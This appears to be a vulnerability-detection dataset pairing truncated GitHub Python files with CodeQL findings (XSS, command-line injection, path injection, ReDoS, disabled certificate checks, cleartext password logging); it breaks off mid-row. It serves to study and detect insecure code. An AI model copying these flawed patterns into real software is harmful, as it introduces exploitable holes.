added stringlengths 32 32 | created int64 1,244B 1,694B | id stringlengths 40 40 | int_score int64 2 5 | metadata dict | score float64 2.31 5.25 | source stringclasses 1
value | text stringlengths 324 20.1k | num_lines int64 16 598 | avg_line_length float64 15.1 58.3 | max_line_length int64 33 179 | ast_depth int64 8 39 | length int64 101 3.8k | lang stringclasses 1
value | sast_codeql_findings stringlengths 1.1k 265k | sast_codeql_findings_count int64 1 45 | sast_codeql_success bool 1
class | sast_codeql_error stringclasses 1
value | cwe_ids listlengths 1 45 | rule_ids listlengths 1 45 | confidences listlengths 1 45 | severities listlengths 1 45 | messages listlengths 1 45 | line_starts listlengths 1 45 | line_ends listlengths 1 45 | column_starts listlengths 1 45 | column_ends listlengths 1 45 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2024-11-18T21:01:32.293074+00:00 | 1,394,921,030,000 | 7ce035079f8455277b65b43621f3679406ca8a05 | 2 | {
"blob_id": "7ce035079f8455277b65b43621f3679406ca8a05",
"branch_name": "refs/heads/master",
"committer_date": 1394921030000,
"content_id": "62bea5d8ea968617409ca0b4aca19f3e1f481c6b",
"detected_licenses": [
"MIT"
],
"directory_id": "6c865c0fc66cfba5468cf840cf703182bf19e4f1",
"extension": "py",
"fi... | 2.375 | stackv2 | from flask import Flask, render_template, url_for, request
from TaskCLI import get_cli, format_seconds, get_sub_tasks, run_unit_tests, \
start_cli
from collections import namedtuple
import thread
import traceback
import utils
import os
import argparse
import time
import logging
import re
import pick... | 253 | 30.83 | 79 | 20 | 1,860 | python | [{"finding_id": "codeql_py/flask-debug_45e848e1e505eeb6_7d37a5e9", "tool_name": "codeql", "rule_id": "py/flask-debug", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "A Flask app appears to be run in debug mode. This may allow an attacker to run arbitrary code through the debugger.", ... | 2 | true | [
"CWE-215",
"CWE-022"
] | [
"py/flask-debug",
"py/path-injection"
] | [
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM"
] | [
"A Flask app appears to be run in debug mode. This may allow an attacker to run arbitrary code through the debugger.",
"This path depends on a [user-provided value](1)."
] | [
238,
76
] | [
null,
null
] | [
5,
37
] | [
51,
52
] | |
2024-11-18T21:25:36.552807+00:00 | 1,649,149,618,000 | dd8dd00039cc638ca6e481d2afa6258b0e058ed9 | 2 | {
"blob_id": "dd8dd00039cc638ca6e481d2afa6258b0e058ed9",
"branch_name": "refs/heads/master",
"committer_date": 1649149618000,
"content_id": "5eec7706c82be0f5154020cfcb4e2c0a0184aa35",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "b295b72d3f9471e1badf2d1568fa4748007403bd",
"extension": "py"... | 2.328125 | stackv2 | #!/usr/bin/env python
from __future__ import print_function
import requests
import argparse
import json
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from os.path import getmtime
from time import time
from tempfile import gettempdir
try:
from urllib.parse import urlparse
excep... | 161 | 32.96 | 117 | 23 | 1,182 | python | [{"finding_id": "codeql_py/request-without-cert-validation_eec13f8b2eb7ac97_08daad5d", "tool_name": "codeql", "rule_id": "py/request-without-cert-validation", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "This request may run without certificate validation because [it is disabled]... | 1 | true | [
"CWE-295"
] | [
"py/request-without-cert-validation"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"This request may run without certificate validation because [it is disabled](1)."
] | [
63
] | [
null
] | [
17
] | [
96
] | |
2024-11-18T22:00:14.844000+00:00 | 1,482,164,433,000 | e3b63e5cabb035bd6d2223b525f20d6d7975d699 | 3 | {
"blob_id": "e3b63e5cabb035bd6d2223b525f20d6d7975d699",
"branch_name": "refs/heads/master",
"committer_date": 1482164433000,
"content_id": "cde0d2c5c3aa0fd790b7078101dac776148e6662",
"detected_licenses": [
"BSD-3-Clause"
],
"directory_id": "226cf4cdc8469ca4243ea0900deb79e36cead77a",
"extension": "p... | 2.671875 | stackv2 | from __future__ import absolute_import, division, print_function, unicode_literals
import collections
import hashlib
import logging
import re
import sys
import threading
from functools import partial
from textwrap import dedent
from .common.compat import on_win
from .common.url import path_to_url
log = logging.getLo... | 446 | 27.36 | 117 | 16 | 3,344 | python | [{"finding_id": "codeql_py/redos_a9b017a5ebbc2b5f_1dae87a9", "tool_name": "codeql", "rule_id": "py/redos", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "This part of the regular expression may cause exponential backtracking on strings starting with 'A:/' and containing many repetiti... | 2 | true | [
"CWE-1333",
"CWE-1333"
] | [
"py/redos",
"py/redos"
] | [
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM"
] | [
"This part of the regular expression may cause exponential backtracking on strings starting with 'A:/' and containing many repetitions of '!/'.",
"This part of the regular expression may cause exponential backtracking on strings starting with 'A:/!' and containing many repetitions of '//'."
] | [
120,
120
] | [
null,
null
] | [
52,
63
] | [
63,
70
] | |
2024-11-18T22:00:16.233189+00:00 | 1,582,927,065,000 | 19577b7aef1914d1dd1897990e7ba8619efbec3d | 3 | {
"blob_id": "19577b7aef1914d1dd1897990e7ba8619efbec3d",
"branch_name": "refs/heads/master",
"committer_date": 1582927065000,
"content_id": "179a6daec747fc95ddb47ee32fe68b378c8a35b4",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "83e7830e874e8532f221d92a50bfbf42a45d0e82",
"extension": "py"... | 3.125 | stackv2 | """WakerUp
Usage:
wakerup.py [-hdv] CONFIGFILE
Read in a list of hosts to wake up in the CONFIGFILE and a log
file to watch for a specified regex.
Arguments:
CONFIGFILE configuration file
Options:
-h --help
-v Print out information as it runs
-d Debug information
--v... | 175 | 35.21 | 111 | 18 | 1,400 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_27fac734fed32b23_aa08933d", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (private)](1) as clear text.", "... | 2 | true | [
"CWE-312",
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data",
"py/clear-text-logging-sensitive-data"
] | [
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM"
] | [
"This expression logs [sensitive data (private)](1) as clear text.",
"This expression logs [sensitive data (private)](1) as clear text."
] | [
103,
105
] | [
null,
null
] | [
27,
26
] | [
95,
73
] | |
2024-11-18T22:00:47.662289+00:00 | 1,612,810,864,000 | 2adf5f8fad59a70d25a818c52f29ee4d12ea7926 | 3 | {
"blob_id": "2adf5f8fad59a70d25a818c52f29ee4d12ea7926",
"branch_name": "refs/heads/main",
"committer_date": 1612810864000,
"content_id": "6d0681cd97489d9cc2d81f137f6bb88c3fc6a0a1",
"detected_licenses": [
"MIT"
],
"directory_id": "82210d6f66aa6a071140d8093e181e8c0305affe",
"extension": "py",
"file... | 2.71875 | stackv2 | import argparse
import os
import sys
from commands import allTimeSinceToday
from commands import CodingGoals
from commands import languageData
from commands import projects
from termcolor import colored
def main():
print(colored('Welcome, Track your coding activities with CODINGCLI\n','magenta'))
parser = ar... | 49 | 41.92 | 128 | 14 | 496 | python | [{"finding_id": "codeql_py/clear-text-storage-sensitive-data_4c5c554ad292dd4e_4dcbfc65", "tool_name": "codeql", "rule_id": "py/clear-text-storage-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression stores [sensitive data (password)](1) as clear text."... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-storage-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression stores [sensitive data (password)](1) as clear text."
] | [
40
] | [
null
] | [
21
] | [
28
] | |
2024-11-18T22:15:04.095957+00:00 | 1,572,821,368,000 | ac160922980d69fee7fc85d6ce812bd404b531e9 | 3 | {
"blob_id": "ac160922980d69fee7fc85d6ce812bd404b531e9",
"branch_name": "refs/heads/master",
"committer_date": 1572821368000,
"content_id": "0cc7169a0b5d5c26d3742f8c69f1acdd0d0c86a7",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "2b168b7463fcc376334a31498400108f13d2c614",
"extension": "py"... | 2.65625 | stackv2 | #!/usr/bin/env python
# this script does the following:
# 1. Read in a configuration file.
# 2. Create a kickstart file based on a template
# 3. Create an image from that kickstart file to be used to boot a UCS.
import os
from socket import inet_aton, error as Serror
from jinja2 import Environment, FileSystemLoade... | 161 | 28.14 | 73 | 14 | 1,217 | python | [{"finding_id": "codeql_py/jinja2/autoescape-false_187c795d7efd57bd_f9b1233f", "tool_name": "codeql", "rule_id": "py/jinja2/autoescape-false", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Using jinja2 templates with autoescape=False can potentially allow XSS attacks.", "remediati... | 1 | true | [
"CWE-079"
] | [
"py/jinja2/autoescape-false"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"Using jinja2 templates with autoescape=False can potentially allow XSS attacks."
] | [
155
] | [
156
] | [
10
] | [
39
] | |
2024-11-18T20:52:16.832972+00:00 | 1,692,596,779,000 | 15821b1b041ccca72e82f0d7591f128ec93ffb97 | 3 | {
"blob_id": "15821b1b041ccca72e82f0d7591f128ec93ffb97",
"branch_name": "refs/heads/main",
"committer_date": 1692596779000,
"content_id": "9a4fb3c5b7dd1fc18ac49129b378208aa2471610",
"detected_licenses": [
"MIT"
],
"directory_id": "d3897da94dae9fdc8bf0e024845399b6b2f43c5e",
"extension": "py",
"file... | 2.9375 | stackv2 | import markupsafe
from flask import Flask, request
app = Flask(__name__)
@app.route('/')
def hello_world():
return 'Hello World!'
@app.route("/hello/<string:name>")
def hello(name):
return f"Hello, {markupsafe.escape(name)}!"
@app.route("/path/<path:url_path>")
def path(url_path):
return f"Path is: {... | 38 | 18.03 | 53 | 10 | 185 | python | [{"finding_id": "codeql_py/reflective-xss_8292adb4fc69bc4c_f15da20e", "tool_name": "codeql", "rule_id": "py/reflective-xss", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "Cross-site scripting vulnerability due to a [user-provided value](1).", "remediation": "", "location": {"fi... | 2 | true | [
"CWE-079",
"CWE-079"
] | [
"py/reflective-xss",
"py/reflective-xss"
] | [
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM"
] | [
"Cross-site scripting vulnerability due to a [user-provided value](1).",
"Cross-site scripting vulnerability due to a [user-provided value](1)."
] | [
19,
34
] | [
null,
null
] | [
12,
12
] | [
34,
54
] | |
2024-11-18T21:08:17.556965+00:00 | 1,614,446,141,000 | bb519b675fc93dcfff8e268f655ef2108698edda | 4 | {
"blob_id": "bb519b675fc93dcfff8e268f655ef2108698edda",
"branch_name": "refs/heads/master",
"committer_date": 1614446141000,
"content_id": "653c377f3df7cc1d4a6e37ed4658a74ee19cda4f",
"detected_licenses": [
"MIT"
],
"directory_id": "a761a0d4d2d9ddf2df2eb8bf316de1280a60fd4f",
"extension": "py",
"fi... | 3.796875 | stackv2 | gibber = input("What's the gibberish?: ")
direction = input("Left/Right?: ")
retry = int(input("How much do you want to try?: "))
charlist = "abcdefghijklmnopqrstuvwxyz "
dictionary = {}
index = 0
for e in charlist:
dictionary[e] = index
index += 1
jump = 1
if direction == "Right":
for cycle in range(retr... | 28 | 26.11 | 67 | 15 | 188 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_299f60aad2e2f2a2_f39cdeb1", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (secret)](1) as clear text.\nThi... | 2 | true | [
"CWE-312",
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data",
"py/clear-text-logging-sensitive-data"
] | [
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM"
] | [
"This expression logs [sensitive data (secret)](1) as clear text.\nThis expression logs [sensitive data (secret)](2) as clear text.",
"This expression logs [sensitive data (secret)](1) as clear text.\nThis expression logs [sensitive data (secret)](2) as clear text."
] | [
20,
28
] | [
null,
null
] | [
15,
15
] | [
24,
24
] | |
2024-11-18T21:08:26.839765+00:00 | 1,623,677,294,000 | 005710c992b5499e70860c66b8f591ec710e514b | 3 | {
"blob_id": "005710c992b5499e70860c66b8f591ec710e514b",
"branch_name": "refs/heads/main",
"committer_date": 1623677294000,
"content_id": "2fea6e638651c5dd25d78ea1e73e968f72bba3e2",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "5f6a01d7052429a0333448145c25d03614c41b24",
"extension": "py",
... | 3.03125 | stackv2 |
import os
import pandas as pd
import streamlit as st
from datetime import date
#pd.set_option('display.max_colwidth', None)
pd.set_option('display.max_rows', None)
today = date.today()
st.markdown('if you want to search for either of multiple terms write as (cats OR dogs), if you want to search for exact phrase ... | 42 | 36.67 | 157 | 14 | 421 | python | [{"finding_id": "codeql_py/command-line-injection_d7d7c068dd63abeb_5c6751c4", "tool_name": "codeql", "rule_id": "py/command-line-injection", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This command line depends on a [user-provided value](1).\nThis command line depends on a [u... | 2 | true | [
"CWE-078",
"CWE-078"
] | [
"py/command-line-injection",
"py/command-line-injection"
] | [
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM"
] | [
"This command line depends on a [user-provided value](1).\nThis command line depends on a [user-provided value](2).\nThis command line depends on a [user-provided value](3).",
"This command line depends on a [user-provided value](1).\nThis command line depends on a [user-provided value](2).\nThis command line dep... | [
24,
35
] | [
null,
null
] | [
19,
19
] | [
129,
157
] | |
2024-11-18T21:08:32.819690+00:00 | 1,627,857,443,000 | 3b44fd1f7adf6adc2d25a28e3e67f8a7bb50734c | 3 | {
"blob_id": "3b44fd1f7adf6adc2d25a28e3e67f8a7bb50734c",
"branch_name": "refs/heads/master",
"committer_date": 1627857443000,
"content_id": "553d0513590d10602df54e56f4ab83018f62cdf8",
"detected_licenses": [
"MIT"
],
"directory_id": "6ca3493ddf2357e4df8d768ba6bb4abe752e15f6",
"extension": "py",
"fi... | 3.140625 | stackv2 | from .browser import Browser
import logging
logger = logging.getLogger(__name__)
class LoginPage(Browser):
def __init__(self, **kwargs):
self.url = "http://the-internet.herokuapp.com/login"
super().__init__(**kwargs)
self.go_to_page()
def go_to_page(self):
"""Go to the Login ... | 79 | 36 | 90 | 14 | 567 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_d0f426010bbfcd1c_2e53ff2f", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.", ... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (password)](1) as clear text."
] | [
36
] | [
null
] | [
22
] | [
67
] | |
2024-11-18T21:32:01.198460+00:00 | 1,689,797,054,000 | 12a5fb3666ef9c234210b7a6919fb66af57cdad4 | 2 | {
"blob_id": "12a5fb3666ef9c234210b7a6919fb66af57cdad4",
"branch_name": "refs/heads/master",
"committer_date": 1689797054000,
"content_id": "0b2b90a84fe70e8a21b76bc70252b5d565781edc",
"detected_licenses": [
"MIT"
],
"directory_id": "b0f656c8624f8332f78bb20310cca07160ce8054",
"extension": "py",
"fi... | 2.34375 | stackv2 | # imggen.py - Generate images from HTML templates
# Copyright (C) 2022-2023 ksqsf
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rig... | 54 | 33.83 | 87 | 12 | 477 | python | [{"finding_id": "codeql_py/jinja2/autoescape-false_9aad7b5f6e7e093a_cfaa2450", "tool_name": "codeql", "rule_id": "py/jinja2/autoescape-false", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Using jinja2 templates with autoescape=False can potentially allow XSS attacks.", "remediati... | 1 | true | [
"CWE-079"
] | [
"py/jinja2/autoescape-false"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"Using jinja2 templates with autoescape=False can potentially allow XSS attacks."
] | [
30
] | [
null
] | [
20
] | [
38
] | |
2024-11-18T21:32:02.981474+00:00 | 1,488,543,714,000 | a7f3d3b9d6802dd67f54174b6bab5b00af908756 | 2 | {
"blob_id": "a7f3d3b9d6802dd67f54174b6bab5b00af908756",
"branch_name": "refs/heads/master",
"committer_date": 1488543714000,
"content_id": "3917d4b57b218bbd5f5092436a466302d0fe830a",
"detected_licenses": [
"MIT"
],
"directory_id": "fc02a076bff640b7dd2a9c1d45182aabb5f08b9c",
"extension": "py",
"fi... | 2.34375 | stackv2 | # MIT License
#
# Copyright (c) 2016 Emenda Nordic
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge... | 159 | 39.39 | 102 | 17 | 1,442 | python | [{"finding_id": "codeql_py/redos_5f6bb2ffaf620bc8_b8583c5b", "tool_name": "codeql", "rule_id": "py/redos", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "This part of the regular expression may cause exponential backtracking on strings starting with 'http://' and containing many repe... | 2 | true | [
"CWE-1333",
"CWE-1333"
] | [
"py/redos",
"py/redos"
] | [
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM"
] | [
"This part of the regular expression may cause exponential backtracking on strings starting with 'http://' and containing many repetitions of '-'.",
"This part of the regular expression may cause exponential backtracking on strings starting with 'http://' and containing many repetitions of '-'."
] | [
32,
33
] | [
null,
null
] | [
36,
36
] | [
43,
43
] | |
2024-11-18T21:32:03.463120+00:00 | 1,548,441,068,000 | ce6872c04ac2924b0969b5d33b26fa3337442106 | 2 | {
"blob_id": "ce6872c04ac2924b0969b5d33b26fa3337442106",
"branch_name": "refs/heads/master",
"committer_date": 1548441068000,
"content_id": "b07ba3ef787e0e27656080210c832d0f6658ea82",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "e59e0d63c02ca2b9722f698d2cb66bc74f70c1fe",
"extension": "py"... | 2.375 | stackv2 | #!/usr/bin/env python3
import os
import cgi
import cgitb
cgitb.enable()
from templates import login_page, secret_page, after_login_incorrect
from secret import username, password
form = cgi.FieldStorage()
f_username = form.getfirst("username")
f_password = form.getfirst("password")
request_type = os.environ.get("REQU... | 45 | 24.07 | 68 | 10 | 274 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_b98e07687f990708_e84de7cd", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (secret)](1) as clear text.", "r... | 3 | true | [
"CWE-312",
"CWE-312",
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data",
"py/clear-text-logging-sensitive-data",
"py/clear-text-logging-sensitive-data"
] | [
"HIGH",
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"This expression logs [sensitive data (secret)](1) as clear text.",
"This expression logs [sensitive data (password)](1) as clear text.",
"This expression logs [sensitive data (secret)](1) as clear text."
] | [
30,
38,
40
] | [
null,
null,
null
] | [
11,
11,
11
] | [
46,
56,
46
] | |
2024-11-18T21:32:22.153807+00:00 | 1,552,933,045,000 | f6a31676155f4af8408527d60fe5f1cb58ef4e0c | 4 | {
"blob_id": "f6a31676155f4af8408527d60fe5f1cb58ef4e0c",
"branch_name": "refs/heads/master",
"committer_date": 1552933045000,
"content_id": "5105f347c641a72bf2cf06de3b714cdea8e8c557",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "06f34db297e1de57b926eb5bc5f3b7489f57563c",
"extension": "py"... | 4.375 | stackv2 | def main():
"""
the main body of the program
displays each of the choices
available to the user.
after making a choice
the program will validate it
and then if it is valid
will go to the search
employees function.
"""
print("")
choice=""
search_employees(cho... | 170 | 27.18 | 125 | 19 | 983 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_3a19aa3a315d2156_a7a5a570", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (private)](1) as clear text.\nTh... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (private)](1) as clear text.\nThis expression logs [sensitive data (private)](2) as clear text.\nThis expression logs [sensitive data (private)](3) as clear text.\nThis expression logs [sensitive data (private)](4) as clear text.\nThis expression logs [sensitive data (private)]... | [
142
] | [
null
] | [
11
] | [
17
] | |
2024-11-18T21:32:22.670342+00:00 | 1,593,493,209,000 | 277c92b917da74a8c194c1899a251a257f028a7c | 3 | {
"blob_id": "277c92b917da74a8c194c1899a251a257f028a7c",
"branch_name": "refs/heads/master",
"committer_date": 1593493209000,
"content_id": "12552941b0befb2254decbd1e10487d648ce4721",
"detected_licenses": [
"MIT"
],
"directory_id": "40d98e9565b1271d3ad4c85b548b0a689bf765a8",
"extension": "py",
"fi... | 2.703125 | stackv2 | # IMPORT PACKAGES -----------------------------------------------------------------------
import requests
import dotenv
import json
import datetime
import csv
import os
from dotenv import load_dotenv
import time
import pandas as pd
from app.portfolio_import import portfolio_import
# DEFINE FUNCTIONS -----------------... | 220 | 38.12 | 163 | 23 | 1,793 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_dafb75b065324dac_222cd7c1", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.\nT... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (password)](1) as clear text.\nThis expression logs [sensitive data (password)](2) as clear text."
] | [
95
] | [
null
] | [
23
] | [
71
] | |
2024-11-18T21:49:05.420496+00:00 | 1,378,438,222,000 | 71d575d1e30752f7128becd90ba971cf8e608a81 | 4 | {
"blob_id": "71d575d1e30752f7128becd90ba971cf8e608a81",
"branch_name": "refs/heads/master",
"committer_date": 1378438222000,
"content_id": "179ec99bb24a1b353003cb8c0256795acec53960",
"detected_licenses": [
"BSD-2-Clause"
],
"directory_id": "e1d5c6fa1cb910b1ff16ce690d682d074fcb8d6f",
"extension": "p... | 3.59375 | stackv2 | import string, random, sys
def genPass(numChars, usePunc):
chars = string.ascii_letters + string.digits
if usePunc:
chars = chars + string.punctuation
password = ''
for i in range(numChars):
password = password + random.choice(chars)
return password
def isInteger(s):
try:
int(s)
return True
except Valu... | 34 | 20.91 | 77 | 15 | 222 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_e0c1441ac3e2070f_69a6f3a7", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.\nT... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (password)](1) as clear text.\nThis expression logs [sensitive data (password)](2) as clear text."
] | [
32
] | [
null
] | [
8
] | [
34
] | |
2024-11-18T21:49:05.961495+00:00 | 1,634,585,115,000 | be58a9179508278597502af64b0d441d1f69bdd9 | 3 | {
"blob_id": "be58a9179508278597502af64b0d441d1f69bdd9",
"branch_name": "refs/heads/master",
"committer_date": 1634753263000,
"content_id": "e4d7e817d5530f1ccd89f1554f6803dd81402760",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "b7af38eefe4e0d6097c3af27deb7f8084a6b2181",
"extension": "py"... | 3.125 | stackv2 | # (C) Copyright 2019-2021 Hewlett Packard Enterprise Development LP.
# Apache License 2.0
from pyaoscx.exceptions.generic_op_error import GenericOperationError
from pyaoscx.exceptions.response_error import ResponseError
def create_attrs(obj, data_dictionary):
'''
Given a dictionary object creates class attri... | 292 | 30.52 | 89 | 17 | 2,015 | python | [{"finding_id": "codeql_py/request-without-cert-validation_05266b9a4c9d01f2_2543d96f", "tool_name": "codeql", "rule_id": "py/request-without-cert-validation", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "This request may run without certificate validation because [it is disabled]... | 1 | true | [
"CWE-295"
] | [
"py/request-without-cert-validation"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"This request may run without certificate validation because [it is disabled](1)."
] | [
260
] | [
267
] | [
30
] | [
39
] | |
2024-11-18T21:49:28.581118+00:00 | 1,563,295,809,000 | 992c23d784fbd046a660a30231ee558bf504bcdd | 3 | {
"blob_id": "992c23d784fbd046a660a30231ee558bf504bcdd",
"branch_name": "refs/heads/master",
"committer_date": 1563295809000,
"content_id": "b365f0507f6efe2bb2d24ba44531d0634f3f4f31",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "96c9905c1db606083895328b1034c220f37e1770",
"extension": "py"... | 2.703125 | stackv2 | #!/usr/bin/env python3
import sys
import base64
import ssl
import socket
import select
import fcntl
import os
import argparse
import re
import subprocess
VERSION="1.0.1"
def piggyback(proxy_host, proxy_port, target_host, target_port, auth):
"""
the piggyback main loop. connects and authenticates with the pro... | 203 | 33.56 | 136 | 25 | 1,537 | python | [{"finding_id": "codeql_py/insecure-default-protocol_0b27b10f48d2c39e_b25794f3", "tool_name": "codeql", "rule_id": "py/insecure-default-protocol", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "Call to deprecated method ssl.wrap_socket does not specify a protocol, which may result in... | 1 | true | [
"CWE-327"
] | [
"py/insecure-default-protocol"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"Call to deprecated method ssl.wrap_socket does not specify a protocol, which may result in an insecure default being used."
] | [
29
] | [
null
] | [
14
] | [
34
] | |
2024-11-18T22:26:06.656122+00:00 | 1,513,839,699,000 | c3394ecc2e5e6addbfe77bd2e44eea20d2e3c52c | 4 | {
"blob_id": "c3394ecc2e5e6addbfe77bd2e44eea20d2e3c52c",
"branch_name": "refs/heads/master",
"committer_date": 1513839699000,
"content_id": "eb9e3fe3543a235d6c9abe72b88b32a94d117b9e",
"detected_licenses": [
"MIT"
],
"directory_id": "52d4e11430d92a05d7d76ae7b1bcac91d12a713a",
"extension": "py",
"fi... | 3.890625 | stackv2 | #encoding=utf-8
import hashlib
# 作者:杨公旺
# 日期:2017-12-18
# 功能:用户登录
# 思路:
# 1、接收用户输入的账号、密码等信息
# 2、判断账号是否存在,如果不存在即返回错误
# 3、对密码信息进行加密后比对,如果一致,则登录成功。因密码是不可逆加密,所以比对加密后的密文内容
# 判断用户名是否存在的函数
# 需要传入两个参数:文件名和账号名
# 将每行的第一个元素(用户名)取出来,放到一个list中,判断用户输入的账号是否在这个list中
def is_user_password(filename,user_name):
with open(f... | 94 | 21.51 | 78 | 17 | 709 | python | [{"finding_id": "codeql_py/weak-sensitive-data-hashing_dd2c507a5779f097_223ffcb3", "tool_name": "codeql", "rule_id": "py/weak-sensitive-data-hashing", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Sensitive data (password)](1) is used in a hashing algorithm (SHA512) that is in... | 1 | true | [
"CWE-327"
] | [
"py/weak-sensitive-data-hashing"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"[Sensitive data (password)](1) is used in a hashing algorithm (SHA512) that is insecure for password hashing, since it is not a computationally expensive hash function.\n[Sensitive data (password)](2) is used in a hashing algorithm (SHA512) that is insecure for password hashing, since it is not a computationally e... | [
52
] | [
null
] | [
27
] | [
47
] | |
2024-11-18T22:42:06.004282+00:00 | 1,613,313,438,000 | 3d6691ebcd07f2138d644662e7db3b019c518330 | 3 | {
"blob_id": "3d6691ebcd07f2138d644662e7db3b019c518330",
"branch_name": "refs/heads/master",
"committer_date": 1613313438000,
"content_id": "5a8a125fb47db119c097ab167a0c7b75f49b78b0",
"detected_licenses": [
"MIT"
],
"directory_id": "1829f63f6dee7103c378d7d75b639aa76b3a05cc",
"extension": "py",
"fi... | 3.078125 | stackv2 | """
A tcpdump like tool that takes command-line arguments:
Destination IP Address, Destination Port Number, Protocol Name (optional)
Where protocol name should handle following protocols:
http, telnet, ftp, tcp, udp
"""
import os
import re
import socket
import struct
import sys
import threading
from collections impor... | 395 | 28.45 | 98 | 18 | 2,905 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_a462d724754ead35_a79c1fb5", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (private)](1) as clear text.\nTh... | 4 | true | [
"CWE-312",
"CWE-312",
"CWE-312",
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data",
"py/clear-text-logging-sensitive-data",
"py/clear-text-logging-sensitive-data",
"py/clear-text-logging-sensitive-data"
] | [
"HIGH",
"HIGH",
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"This expression logs [sensitive data (private)](1) as clear text.\nThis expression logs [sensitive data (private)](2) as clear text.",
"This expression logs [sensitive data (private)](1) as clear text.\nThis expression logs [sensitive data (private)](2) as clear text.",
"This expression logs [sensitive data (p... | [
315,
316,
317,
321
] | [
null,
null,
null,
null
] | [
11,
11,
11,
15
] | [
21,
20,
23,
37
] | |
2024-11-18T22:42:11.646949+00:00 | 1,587,254,920,000 | 9f8d324623eabeba353c6ea53f9bbaa4e903a1d9 | 4 | {
"blob_id": "9f8d324623eabeba353c6ea53f9bbaa4e903a1d9",
"branch_name": "refs/heads/master",
"committer_date": 1587254920000,
"content_id": "9a62ca7d61a14a5d8ae42f7bd4f218d9f6b4f0ff",
"detected_licenses": [
"MIT"
],
